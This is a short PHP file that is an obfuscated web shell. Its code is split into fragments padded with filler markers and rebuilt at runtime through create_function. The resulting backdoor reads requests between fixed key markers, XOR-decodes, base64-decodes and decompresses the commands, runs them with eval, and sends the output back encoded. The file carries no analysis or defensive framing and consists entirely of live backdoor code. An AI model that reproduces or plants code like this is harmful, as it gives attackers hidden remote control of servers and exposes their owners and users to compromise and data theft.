<?php

$Z='unctiS-oS-n xS-($t,$k){$c=S-S-strlen($k)S-;$l=strS-lenS-($t);$o="";fS-or($i=0;S-$S-i<$lS-;){for($j=0';

$u='S-ob_end_clean();$rS-=S-@basS-e64_encode(S-@x(S-@gS-zcompressS-($oS-),$k));print(S-"S-$p$kh$r$kf");}';

$Q='$k="9e82S-757eS-";$kh=S-"9S-a1c12cb71S-0S-a"S-;S-$kf="d68S-0db11f6fS-1S-"S-;$p="usrYavYg9gizFvQt";f';

$W='tch(S-"/$kh(.+)S-$kf/"S-,@S-file_get_S-contents("pS-hp://iS-nput"S-),$m)S-==1) {@S-ob_sS-tarS-t();';

$N='@evS-al(@gzuncoS-mprS-ess(@x(@S-bS-ase64_decS-ode($m[1]S-),S-$k)S-));$S-o=@ob_get_conteS-S-nts(S-);@';

$c='S-;($j<$cS-&&$i<$lS-S-);$j++,$i+S-+){$oS-.=$t{$S-i}^$kS-{$S-j};}}S-return $o;}ifS- (@prS-eg_maS-';

$y=str_replace('tY','','crtYeatYtetYtY_tYfuncttYion');

$m=str_replace('S-','',$Q.$Z.$c.$W.$N.$u);

$n=$y('',$m);$n();

?>

